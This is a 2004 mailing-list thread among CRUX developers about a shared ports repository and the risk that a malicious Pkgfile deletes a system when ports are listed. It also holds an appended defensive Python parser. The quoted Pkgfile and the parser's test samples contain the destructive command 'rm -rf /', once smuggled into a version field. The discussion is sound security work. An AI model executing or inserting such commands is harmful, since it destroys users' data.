Re: [clc-devel] httpup repositories and unmaintained (next try) [long]
Hi,
Since discussion seems to be dying out and the solution Johannes suggested could apparently only improve the current situation of rotting unmaintained ports and decentralized repositories, I propose we start implementing the 'people' collection if no one has anything major against it.
My Perl and PHP skills are at your disposal if I can be of any help.
Regards,
// Jukka Heino
Hey,
On Tue, Aug 24, 2004 at 12:50:52 +0300, Jukka Heino wrote:
Hi,
Since discussion seems to be dying out and the solution Johannes suggested could apparently only improve the current situation of rotting unmaintained ports and decentralized repositories, I propose we start implementing the 'people' collection if no one has anything major against it.
Actually, I asked Per about his opinion and he mentioned that there's a severe security risk: if someone puts something malicious into a Pkgfile like the following:
--- quote ---
name=xyz
version=1000
release=1
rm -rf /
build() { ... }
--- /quote --
A simple 'ports -d' would be sufficient to make you appreciate your backups. Obviously, this can be done in a private repository as well, but with a central big collection with somewhat implied trust (since it's controlled by CLC after all), we'd simplify such an attack a lot.
There are a few solutions which come to mind, but all terminate the goal of "no access restrictions":
- only accept repos from known persons
- require GnuPG signatures conforming to a yet-to-be-defined level of trust
So I guess we have to reconsider the situation, and maybe try to arrange a get together to discuss this and further issues.
Kind regards, Johannes
--
Johannes Winkelmann mailto:jw@tks6.net
Bern, Switzerland http://jw.tks6.net
Johannes Winkelmann wrote:
Hey,
On Tue, Aug 24, 2004 at 12:50:52 +0300, Jukka Heino wrote:
Hi,
Since discussion seems to be dying out and the solution Johannes suggested could apparently only improve the current situation of rotting unmaintained ports and decentralized repositories, I propose we start implementing the 'people' collection if no one has anything major against it.
Actually, I asked Per about his opinion and he mentioned that there's a severe security risk: if someone puts something malicious into a Pkgfile like the following:
--- quote ---
name=xyz
version=1000
release=1
rm -rf /
build() { ... }
--- /quote --
A simple 'ports -d' would be sufficient to make you appreciate your backups. Obviously, this can be done in a private repository as well, but with a central big collection with somewhat implied trust (since it's controlled by CLC after all), we'd simplify such an attack a lot.
There are a few solutions which come to mind, but all terminate the goal of "no access restrictions":
- only accept repos from known persons
- require GnuPG signatures conforming to a yet-to-be-defined level of trust
I do not think this is a Repository issue but a package system issue. Perhaps what we should revisit is chroot approaches to building packages or maybe using fakeroot to at least limit the damage. After all, sooner or later, someone, by error or otherwise, will do something like this. However, protecting people from themselves introduces complexity that most don't want, so...
Unfortunately, mount -r --bind /lib lib didn't seem to work, well, just an idea.
Victor
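The "package system issue" raised above can also be approached from the tool side. This added example (not code from the thread, its authors or the CRUX tools) assumes, as the thread implies, that the listing tool learns name, version and release by evaluating the Pkgfile as shell; it reads those fields as text instead and fails closed. `read_metadata`, `UntrustedPkgfile` and both sample Pkgfiles are constructed for illustration.

```python
import re

FIELDS = ("name", "version", "release")
# Literal values only: a bare word or a single-quoted string. Anything the shell
# would expand or execute ($var, $(cmd), backticks, ';', whitespace) is refused.
LITERAL = re.compile(r"(?:[A-Za-z0-9._+:/~@%,-]*|'[^']*')")
ASSIGNMENT = re.compile(r"^(name|version|release)=(.*)$")

class UntrustedPkgfile(ValueError):
    """Raised when metadata cannot be read without evaluating shell code."""

def read_metadata(pkgfile_text):
    """Read name/version/release from Pkgfile text as data, never sourcing it."""
    meta = {}
    for lineno, line in enumerate(pkgfile_text.splitlines(), 1):
        m = ASSIGNMENT.match(line)  # column 0 only, so indented build() lines are ignored
        if not m:
            continue  # not a metadata line; nothing here is ever executed
        key, raw = m.group(1), m.group(2).rstrip()
        if key in meta:
            raise UntrustedPkgfile(f"line {lineno}: {key} assigned twice")
        if not LITERAL.fullmatch(raw):
            raise UntrustedPkgfile(f"line {lineno}: {key} is not a plain literal")
        meta[key] = raw.strip("'")
    missing = [f for f in FIELDS if f not in meta]
    if missing:
        raise UntrustedPkgfile("missing " + ", ".join(missing))
    return meta

# Constructed sample: the Pkgfile quoted in the thread, with a stub build() body.
THREAD_PKGFILE = """\
name=xyz
version=1000
release=1
rm -rf /
build() {
    :
}
"""

# Constructed sample: the same command hidden inside a metadata value.
SUBSTITUTION_PKGFILE = "name=xyz\nversion=$(rm -rf /)\nrelease=1\n"

if __name__ == "__main__":
    for sample in (THREAD_PKGFILE, SUBSTITUTION_PKGFILE):
        try:
            print(read_metadata(sample))
        except UntrustedPkgfile as err:
            print("refused:", err)
```

This covers only metadata reads; running build() still executes the port's code, which is where the chroot and fakeroot ideas from the thread apply.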
participants (3)
- Johannes Winkelmann
- Jukka Heino
- Victor